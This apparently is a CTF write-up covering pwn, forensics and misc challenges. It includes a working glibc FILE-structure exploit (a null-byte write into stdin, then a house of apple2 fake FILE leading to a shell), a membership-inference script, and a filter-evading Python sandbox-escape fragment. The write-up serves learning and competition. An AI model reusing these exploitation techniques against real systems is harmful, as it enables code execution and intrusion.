
1. PWN

1. Nullulllllu

The challenge hands out libc_base directly and then lets you write a single \x00 byte to an address of your choice, once.

The null byte goes into the lowest byte of _IO_buf_base in _IO_2_1_stdin_. stdin is unbuffered here, so its buffer is the one-byte _shortbuf inside the struct itself (offset 0x83); with this libc's alignment of _IO_2_1_stdin_, clearing that low byte moves _IO_buf_base back to the struct's own _IO_write_base field (offset 0x20). The next getchar that has to refill the buffer therefore reads our input straight over _IO_write_base.._IO_buf_end: we restore the three write pointers and repoint _IO_buf_base and _IO_buf_end at _IO_2_1_stdout_. One more getchar-driven refill then writes a house of apple2 fake FILE over stdout, and the program's next printf walks the fake vtable and ends up in system(" sh;"), which gives the shell.

exp

from pwn import *

def debug(c=0):
    if c:
        gdb.attach(p, c)
    else:
        gdb.attach(p)
    pause()

def get_sb():
    return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))

#-----------------------------------------------------------------------------------------
s = lambda data: p.send(data)
sa = lambda text, data: p.sendafter(text, data)
sl = lambda data: p.sendline(data)
sla = lambda text, data: p.sendlineafter(text, data)
r = lambda num=4096: p.recv(num)
rl = lambda text: p.recvuntil(text)
pr = lambda num=4096: print(p.recv(num))
inter = lambda: p.interactive()
l32 = lambda: u32(p.recvuntil(b'\xf7')[-4:].ljust(4, b'\x00'))
l64 = lambda: u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
uu32 = lambda: u32(p.recv(4).ljust(4, b'\x00'))
uu64 = lambda: u64(p.recv(6).ljust(8, b'\x00'))
int16 = lambda data: int(data, 16)
lg = lambda s, num: p.success('%s -> 0x%x' % (s, num))
#-----------------------------------------------------------------------------------------

context(os='linux', arch='amd64', log_level='debug')

p = remote('ctf2024-entry.r3kapig.com', 30371)
#p = remote('127.0.0.1', 9999)
elf_patch = './chall'
#p = process(elf_patch)
elf = ELF(elf_patch)
libc = ELF('./libc.so.6')

# step 1 : the program prints libc_base for us
sla(b' ', b'1')
rl(b'0x')
libc_base = int(r(12), 16)  # +0x6d80
environment = libc_base + libc.sym['__environ']
system, binsh = get_sb()

stdin = libc_base + libc.sym['_IO_2_1_stdin_']
stdin_IO_buf_base = stdin + 7*8     # offset 0x38: _IO_buf_base
stdin_old_value = stdin + 0x83      # _shortbuf: the 1-byte buffer of an unbuffered stdin
stdout = libc_base + libc.sym['_IO_2_1_stdout_']
stderr = libc_base + libc.sym['_IO_2_1_stderr_']

# step 2 : printf - stdout - house of apple2
_IO_wfile_jumps = libc_base + 0x202228   # offset in the provided libc.so.6
base_addr = stdout
fake_io = b' sh;\x00\x00\x00'                  # _flags doubles as the string handed to system()
fake_io = fake_io.ljust(0x68, b'\x00')
fake_io += p64(system)                        # 0x68: read back as _wide_vtable->__doallocate
fake_io = fake_io.ljust(0x88, b'\x00')
fake_io += p64(base_addr + 0x5000)            # 0x88: _lock, any writable memory
fake_io += p64(0)*2
fake_io += p64(base_addr)                     # 0xa0: _wide_data -> the fake FILE itself
fake_io = fake_io.ljust(0xd8, b'\x00')
fake_io += p64(_IO_wfile_jumps - 0x20)        # 0xd8: vtable shifted so the xsputn slot hits _IO_wfile_overflow
fake_io = fake_io.ljust(0xe0, b'\x00')
fake_io += p64(base_addr)                     # 0xe0: _wide_data->_wide_vtable -> the fake FILE itself

# the one null byte: low byte of stdin->_IO_buf_base, which now points at stdin->_IO_write_base
sla(b' ', b'2')
sla(b'Mem: ', hex(stdin_IO_buf_base))
#debug('b *$rebase(0x12c3)')

# first refill lands at _IO_write_base: restore the write pointers, aim _IO_buf_base/_IO_buf_end at stdout
sa(b' ', p64(stdin_old_value)*3 + p64(base_addr) + p64(base_addr + len(fake_io) + 1))
sleep(1)
# second refill lands on _IO_2_1_stdout_; the next printf walks the fake vtable
sl(fake_io)

lg('libc_base', libc_base)
inter()
pause()
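As an added illustration, not part of the original exploit, the following Python models the two buffer refills and the house of apple2 layout described above, then walks the pointer chain the way printf would, checking the _flags and _wide_data guard conditions that _IO_wfile_overflow and _IO_wdoallocbuf test on the way. The _IO_wfile_jumps offset is the one from the exploit; the other libc offsets and the 0x7f... base in demo() are sample values assumed for this example, not taken from the challenge.

```python
import struct

# Field offsets in glibc's 64-bit struct _IO_FILE (the layout the exploit relies on)
OFF_WRITE_BASE, OFF_WRITE_PTR, OFF_WRITE_END = 0x20, 0x28, 0x30
OFF_BUF_BASE, OFF_BUF_END, OFF_CHAIN, OFF_LOCK = 0x38, 0x40, 0x68, 0x88
OFF_WIDE_DATA, OFF_VTABLE, OFF_SHORTBUF = 0xa0, 0xd8, 0x83
# struct _IO_wide_data fields, and the _IO_jump_t slots the chain goes through
WD_WRITE_BASE, WD_BUF_BASE, WD_WIDE_VTABLE = 0x18, 0x30, 0xe0
JUMP_OVERFLOW, JUMP_XSPUTN, JUMP_DOALLOCATE = 0x18, 0x38, 0x68
# _flags bits that must be clear for _IO_wfile_overflow to reach __doallocate
_IO_UNBUFFERED, _IO_NO_WRITES, _IO_CURRENTLY_PUTTING = 0x2, 0x8, 0x800

def p64(v): return struct.pack('<Q', v)
def u64(b): return struct.unpack('<Q', b)[0]

def after_null_byte(ptr):
    """Value a pointer takes once its lowest byte is overwritten with 0x00."""
    return ptr & ~0xff

def first_refill(stdin, stdout, fake_len):
    """Data for the first refill, which lands at stdin+0x20: keep the three write
    pointers sane (pointing at _shortbuf) and retarget _IO_buf_base/_IO_buf_end
    at stdout so the *next* refill overwrites _IO_2_1_stdout_."""
    shortbuf = stdin + OFF_SHORTBUF
    return p64(shortbuf) * 3 + p64(stdout) + p64(stdout + fake_len + 1)

def apple2_fake_file(base, system, wfile_jumps, cmd=b' sh;'):
    """House of apple2 fake FILE placed at `base` (over _IO_2_1_stdout_).
    vtable = _IO_wfile_jumps - 0x20 makes the __xsputn slot used by printf resolve
    to _IO_wfile_overflow; _wide_data and _wide_data->_wide_vtable both point back
    at the struct, so __doallocate is fetched from base+0x68 (_chain), where
    system() sits. rdi is the FILE itself, whose first bytes are `cmd`."""
    assert len(cmd) <= 8
    f = bytearray(0xe8)
    f[0:len(cmd)] = cmd
    f[OFF_CHAIN:OFF_CHAIN + 8] = p64(system)
    f[OFF_LOCK:OFF_LOCK + 8] = p64(base + 0x5000)      # any writable, zeroed memory
    f[OFF_WIDE_DATA:OFF_WIDE_DATA + 8] = p64(base)
    f[OFF_VTABLE:OFF_VTABLE + 8] = p64(wfile_jumps - 0x20)
    f[WD_WIDE_VTABLE:WD_WIDE_VTABLE + 8] = p64(base)
    return bytes(f)

def walk_apple2(fake, base, wfile_jumps):
    """Follow the chain printf -> xsputn slot -> _IO_wfile_overflow -> _IO_wdoallocbuf
    -> _wide_vtable->__doallocate, checking each guard, and report what gets called."""
    rel = lambda addr, n=8: fake[addr - base:addr - base + n]
    flags = u64(rel(base))
    assert flags & (_IO_UNBUFFERED | _IO_NO_WRITES | _IO_CURRENTLY_PUTTING) == 0, "bad _flags"
    vtable = u64(rel(base + OFF_VTABLE))
    xsputn_slot = vtable + JUMP_XSPUTN                 # the slot printf dereferences
    assert xsputn_slot == wfile_jumps + JUMP_OVERFLOW, "slot must alias _IO_wfile_jumps.__overflow"
    wide = u64(rel(base + OFF_WIDE_DATA))
    assert u64(rel(wide + WD_WRITE_BASE)) == 0, "_wide_data->_IO_write_base must be NULL"
    assert u64(rel(wide + WD_BUF_BASE)) == 0, "_wide_data->_IO_buf_base must be NULL"
    wvt = u64(rel(wide + WD_WIDE_VTABLE))
    target = u64(rel(wvt + JUMP_DOALLOCATE))
    rdi_string = bytes(rel(base)).split(b'\x00')[0]
    return {'xsputn_slot': xsputn_slot, 'doallocate': target, 'rdi_string': rdi_string}

def demo(libc_base=0x7f0000000000):
    # Assumed sample offsets (only _IO_wfile_jumps comes from the exploit); adjust to your libc.
    stdin, stdout = libc_base + 0x2046e0, libc_base + 0x2045c0
    system, wfile_jumps = libc_base + 0x58740, libc_base + 0x202228
    moved = after_null_byte(stdin + OFF_SHORTBUF)      # _IO_buf_base after the null write
    fake = apple2_fake_file(stdout, system, wfile_jumps)
    return {
        'buf_base_after_null': moved - stdin,          # 0x20, i.e. stdin->_IO_write_base
        'refill1': first_refill(stdin, stdout, len(fake)),
        'refill2': fake,
        'chain': walk_apple2(fake, stdout, wfile_jumps),
    }

if __name__ == '__main__':
    print(demo())
```

The check that matters before sending anything is `buf_base_after_null`: if your libc places _IO_2_1_stdin_ so that (stdin + 0x83) & ~0xff is not stdin + 0x20, the first refill will not land on the write pointers and the rest of the chain has to be re-laid out.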

2. Forensic

1. TPA 01

Throw the E01 image straight into Fire Eye and analyze the "nested evidence".

Honestly, my analysis process for this question was quite convoluted. I felt I was overcomplicating it, mainly because I had too little experience; I even started emulating it.

Flipping through the folders, I found WSL, which together with the "nested evidence" hint makes me think the intended solution is to restore that system.

Fortunately there is a forensic tool, so you can manage without restoring it. What follows is the other route I found, because I had not searched the file system carefully.

Just dig the ciphertext out with 010 Editor.

But you can also see it directly in Fire Eye, along with a hint about the key.

key:

Do you like watch videos on youtube?Something fun there:https://www.youtube.com/@d3f4u1t-lolol

F14G:

Hi players,welcome !Ops,what's that?2d422fc7f2c628c55520984c0673964eb5454dea72f79b1022a34728294c5bf8I guess u need a key to decrypt it.SELECT something FROM somewhere with the windows10 lol~

Going by the hint "SELECT something FROM somewhere", this should involve SQL statements.

Let's look at the video mentioned in the key hint first.

There is a string in it; let's take a look:

0x6d617962652075206e6565642c746861742773206e6f74206162736f6c7574650a726f6f743a5040357357307264466f7255

Decoded from hex it reads:

maybe u need,that's not absolute
root:P@5sW0rdForU

So we have a password. Trying it on MySQL, the login succeeds.

select * from secret;

The FF D8 header shows at a glance that it is a JPEG; save it and it gives the AES decryption key.

Alternatively, the project ibd2sql can parse the database file secret.ibd directly.

2. TPA 02

Two parts: one is to find the attacker's mobile number, the other is Peggy's login password. Start with the traffic: following the TCP streams, the login page turns up in stream 31.

The first flag comes from where the Android phone stores SMS messages.

Then look at the phone folder we were given and analyze the two mobile numbers with Fire Eye.

From the context, 15555215556 should be Peggy's colleague, who came to ask whether Peggy had also received the phishing message.

So 15555215558 below should be the attacker's number. Combine the two directly:

r3ctf{15555215558_l0v3_aNd_peace}

3. Misc

1. Blizzard CN Restarts

Using ShadowEditor.

2. hideAndSeek

Ben has a superpower and loves playing hide and seek. He can teleport anywhere so that no one can find him, but he seems unaware that his ability only works within a certain range.

Rules:

The adorable Ben will only appear within the range of (0, -50, 0) to (128, 50, 128).

Ben will vanish every 10 seconds and reappear in a new location after 10 seconds.

A 'newtp' command has been added so that all players can teleport to any coordinates.

Connect info: 34.81.163.238

A very abstract Minecraft (version 1.19.2) game challenge. At first I really did use the PCL2 launcher to join the game and play.

I saw that a newtp command was provided, and I also looked up plenty of tutorials on MC's tp command, but that got me nowhere; I wandered around the map for a while.

Use newtp to teleport to some coordinates. The command format is:

newtp x y z   (x, y, z being the coordinates to teleport to)

Then just flip through the log file and the flag is there.

Reading the log, you find that Ben's entity type should be a villager, and his name is the flag:

R3CTF{Jus7_play_m0r3_h1de_2nd_seek_w1th_Ben}

3. Transit

Search Bilibili for videos whose cover is highly similar to the shooting location, and find the POV (driver's-view) videos along Line 19. Video BV1ie411M7av covers the shooting location; step through it frame by frame and it appears at 3:35. R3CTF{hangzhou_zhixing_road_station}

Hint: S1611 and S1613 may be signal numbers rather than train numbers. https://www.cnblogs.com/QQ2962269558/p/12743383.html explains that up (S) and down (X) define the train's direction. It is probably an EMU (electric multiple unit).

4. Thief

If the top confidence is greater than 0.85, it is definitely 1 (in the training set):

from pwn import *

p = remote('ctf2024-entry.r3kapig.com', 31395)
num = 0  # how many pictures we have claimed are in the training set

for i in range(500):
    a = p.recvuntil(b'top_10_pred:[')
    b = p.recvuntil(b']')
    b = b.decode().replace('[', '').replace(']', '').split(',')
    c = float(b[0])  # the highest confidence comes first
    if c >= 0.9:
        p.sendlineafter(b'Is this picture in the training set?', b'1')
        num += 1
    else:
        p.sendlineafter(b'Is this picture in the training set?', b'0')
    print(f'no.{i}={c},num={num}')

flag = p.recvline()
print(flag)
p.close()

Of course, the threshold can be adjusted within reason.

R3CTF{caIN_liKe_A1_4nd_rEC_8772b609d39f}
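Added example, not the post's own code: the confidence-threshold rule above, written as a parser for the server's top_10_pred line plus a small sweep that picks the threshold from a handful of labelled samples (the usual confidence-based membership inference: a model is more confident on the inputs it was trained on). The sample lines and their labels are constructed for this example; the real service output is not on this page.

```python
import re

_PRED_RE = re.compile(r'top_10_pred:\s*\[([^\]]*)\]')

def parse_top10(line):
    """Extract the top-10 confidence list from one server line such as
    'top_10_pred:[0.97, 0.01, ...]'. Returns [] if the line has no prediction."""
    m = _PRED_RE.search(line)
    if not m:
        return []
    return [float(x) for x in m.group(1).split(',') if x.strip()]

def is_member(probs, threshold=0.85):
    """Answer 1 (in the training set) when the top confidence reaches the threshold."""
    return 1 if probs and max(probs) >= threshold else 0

def pick_threshold(labelled, candidates=None):
    """Sweep candidate thresholds over (probs, true_label) pairs and return the
    (threshold, accuracy) pair that classifies the most samples correctly."""
    if candidates is None:
        candidates = [i / 100 for i in range(50, 100)]
    best = (None, -1.0)
    for t in candidates:
        correct = sum(is_member(p, t) == y for p, y in labelled)
        acc = correct / len(labelled)
        if acc > best[1]:
            best = (t, acc)
    return best

# Constructed server output with known answers (1 = member); not real challenge data
SAMPLE = [
    ("no.0 top_10_pred:[0.9712, 0.0113, 0.0051, 0.0041, 0.0030, 0.0020, 0.0012, 0.0010, 0.0006, 0.0005]", 1),
    ("no.1 top_10_pred:[0.9988, 0.0004, 0.0003, 0.0001, 0.0001, 0.0001, 0.0001, 0.0000, 0.0000, 0.0000]", 1),
    ("no.2 top_10_pred:[0.6120, 0.2011, 0.0901, 0.0403, 0.0210, 0.0150, 0.0100, 0.0050, 0.0030, 0.0025]", 0),
    ("no.3 top_10_pred:[0.8310, 0.0900, 0.0300, 0.0200, 0.0100, 0.0080, 0.0050, 0.0030, 0.0020, 0.0010]", 0),
    ("no.4 top_10_pred:[0.8720, 0.0500, 0.0300, 0.0200, 0.0100, 0.0080, 0.0050, 0.0030, 0.0010, 0.0010]", 1),
    ("no.5 top_10_pred:[0.4400, 0.3100, 0.1200, 0.0500, 0.0300, 0.0200, 0.0100, 0.0100, 0.0050, 0.0050]", 0),
]

def run_sample(threshold=0.85):
    """Answers the fixed rule would give on SAMPLE, and the best threshold found by the sweep."""
    labelled = [(parse_top10(line), y) for line, y in SAMPLE]
    answers = [is_member(p, threshold) for p, _ in labelled]
    return answers, pick_threshold(labelled)

if __name__ == '__main__':
    print(run_sample())
```

With a real service you do not get labels, so the sweep is only useful on a few rounds whose answers you already know (for instance from a previous run); otherwise the fixed 0.85 to 0.9 rule from the writeup is the practical choice.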

5. hideAndSeek

Cheating solves it in seconds.

Nice villager; a free camera plus entity tracing did it.

6. h1de@ndSe3k

When MC renders a block it gets logged; check the log and it is solved in seconds.

Searching the java.exe process with CE (Cheat Engine) turns up many 'R3CTF', 'r3ctf' and 'flag' strings, so presumably the villagers' names sit in memory in plaintext. After running around the map:

P.S. After testing, the villagers' names only show up in memory once JourneyMap (journeymap-1.19.2-5.9.8-fabric) is loaded, which makes sense, since JourneyMap records some entity NBT.

Or just brute-force the flag.
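Added example, not from the original post: the same memory search done offline in Python over a dump of the process (for instance one saved from Cheat Engine or a minidump), looking for flag-shaped strings stored both as one-byte text and as UTF-16LE, which is how the JVM keeps strings that are not pure Latin-1. The dump bytes in build_sample_dump() are constructed for this example.

```python
import re

# Flag-shaped strings, built from the prefixes the CE search turned up
FLAG_RE = re.compile(r'(?:R3CTF|r3ctf|flag)\{[^}\x00]{1,120}\}')
# Runs of printable ASCII stored as one byte per char (Java compact/Latin-1 strings, C strings)
ASCII_RUN = re.compile(rb'[\x20-\x7e]{6,}')
# The same, stored as UTF-16LE (Java strings with a non-Latin-1 char, Windows wide strings)
UTF16_RUN = re.compile(rb'(?:[\x20-\x7e]\x00){6,}')

def scan_dump(dump):
    """Return (offset, encoding, text) for every flag-shaped string in `dump`,
    sorted by offset, covering both plain and UTF-16LE storage."""
    hits = []
    for m in ASCII_RUN.finditer(dump):
        text = m.group().decode('ascii')
        for f in FLAG_RE.finditer(text):
            hits.append((m.start() + f.start(), 'ascii', f.group()))
    for m in UTF16_RUN.finditer(dump):
        text = m.group().decode('utf-16-le')
        for f in FLAG_RE.finditer(text):
            hits.append((m.start() + 2 * f.start(), 'utf-16le', f.group()))
    return sorted(hits)

def build_sample_dump():
    """Constructed stand-in for a java.exe memory region: padding, an entity record
    with a one-byte flag-like name, junk, a UTF-16LE villager name, and an
    unterminated decoy. Not real challenge memory."""
    parts = [
        b'\x00' * 16,
        b'EntityVillager{name=R3CTF{example_villager_name}}\x00',
        b'\xff\xfe\x7f' * 5,
        'Ben says r3ctf{this_one_is_utf16}'.encode('utf-16-le'),
        b'\x00' * 8,
        b'not a flag R3CTF{',   # no closing brace: must not match
        b'\x00' * 8,
    ]
    return b''.join(parts)

if __name__ == '__main__':
    for off, enc, text in scan_dump(build_sample_dump()):
        print(f'0x{off:08x} {enc:8} {text}')
```

Scanning for the closing brace as well as the prefix is what keeps the output short: the CE search hit many 'R3CTF' fragments, and most of them are not the villager name. Run the same function over a real dump with open(path, 'rb').read().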

7. behind the WALL

def callback(re):
    re = 5
    # Nested same-quote f-strings need Python 3.12+; the method names 'encode',
    # 'fromhex' and 'decode' are assembled piecewise so they never appear literally.
    # 'a'.encode().fromhex('5f').decode() == '_'
    re = getattr(getattr(getattr('a', f'e{f'n'}c{f'o'}d{f'e'}')(), f'f{f'r'}o{f'm'}h{f'e'}x')(f'{re}f'), f'd{f'e'}c{f'o'}d{f'e'}')()
    # the rest of the listing is cut off in the original post
